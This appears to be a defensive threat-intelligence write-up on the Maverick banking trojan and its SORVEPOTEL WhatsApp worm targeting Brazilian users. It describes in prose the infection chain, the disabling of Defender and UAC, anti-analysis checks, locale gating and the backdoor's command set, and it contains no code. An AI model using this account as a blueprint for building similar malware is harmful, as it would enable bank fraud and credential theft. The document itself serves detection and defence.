Maverick Malware

Threat hunters have identified a strong operational and technical overlap between the newly publicised banking trojan dubbed 'Maverick' and an earlier Brazilian trojan known as 'Coyote'. Analysis shows that both families are .NET-based, focusing on Brazilian banks and users, and use similar routines to decrypt and monitor banking URLs and applications. Both include a WhatsApp Web propagation component.

The WhatsApp Vector and the SORVEPOTEL Worm

The campaign's mass-propagation mechanism is a self-spreading component tracked as 'SORVEPOTEL' that abuses WhatsApp Web. Victims receive a phishing-style ZIP file (often masquerading as a receipt or legitimate document); the archive contains a malicious Windows shortcut (.LNK) or obfuscated VBS which, when executed on a desktop, launches cmd.exe or PowerShell to pull the next-stage payload. The worm takes control of the victim's WhatsApp Web session, copying the user's Chrome profile (cookies, tokens, and session data), and using browser automation to send the ZIP file to contacts and groups.

The Dropper, Loader, and Hardening Against Analysis

Investigations show the ZIP typically contains an LNK that triggers a PowerShell chain, which connects to an attacker-controlled host to download a first-stage payload. That staging PowerShell has routines that launch intermediate tools to disable Microsoft Defender and UAC and to fetch a .NET loader. The loader performs anti-analysis checks for reverse-engineering tools and self-terminates if a hostile environment is detected, then downloads the campaign's main modules — the WhatsApp worm (SORVEPOTEL) and the Maverick banking modules.

Brazil-Only Gating and Expanded Victimology

Maverick includes explicit geo/locale gating, which validates time zone, system language, regional settings, and date/time format before installing the banking payload, ensuring execution primarily on Portuguese-language machines in Brazil. Beyond banks, there are signs that operators have singled out hospitality targets, such as hotels in Brazil, suggesting a focus on sectors beyond retail banking. The campaign leverages Brazil's huge WhatsApp footprint — roughly 148 million users — which fuels its rapid spread.

What the Malware Can Do — Supported Commands

Once installed, the backdoor exposes a broad feature set enabling reconnaissance, file operations, process control, and system manipulation. Reported supported commands include (selection follows; this list is from vendor technical write-ups):

• INFO (collect system information)
• CMD (run a command via cmd.exe and capture output)
• POWERSHELL (execute PowerShell)
• SCREENSHOT (capture screen)
• TASKLIST (enumerate processes)
• KILL (terminate a process)
• LIST_FILES / SEARCH (enumerate and search files)
• DOWNLOAD_FILE / UPLOAD_FILE (exfiltrate or fetch files)
• MOVE / COPY / RENAME / DELETE / FILE_INFO (file operations and metadata)
• CREATE_FOLDER (create directories)
• REBOOT / SHUTDOWN (restart or power off with delay)
• UPDATE (self-update)
• CHECK_EMAIL (poll attacker mailbox for new C2 URLs)
  These capabilities enable operators to harvest credentials, stage phishing overlays, take screenshots, and manipulate the endpoint for fraud and lateral movement.

What Defenders Should Prioritise

Practically speaking, organisations and users in Brazil (and those with Brazil-facing customers) should prioritise: blocking and monitoring execution of downloaded LNK and VBS files from messaging platforms; enforcing endpoint controls that prevent unsigned PowerShell execution and block common automation tools where not required; ensuring Defender/EDR protections are hardened against tampering; and monitoring anomalous outbound mail/IMAP activity that could indicate attacker-controlled mailboxes being polled for C2.

Key Takeaways

• Maverick is a sophisticated, Brazil-focused banking trojan delivered via a self-propagating WhatsApp worm (SORVEPOTEL).
• Multiple vendors agree that Maverick shares code and tactics with the earlier Coyote family, but treat it as a new, actively evolving threat.
• The campaign combines WhatsApp automation, browser profile theft, PowerShell-based loaders, and an email-based C2 for resilience and operator control — a combination that enables rapid, wide-scale propagation and stealthy banking fraud.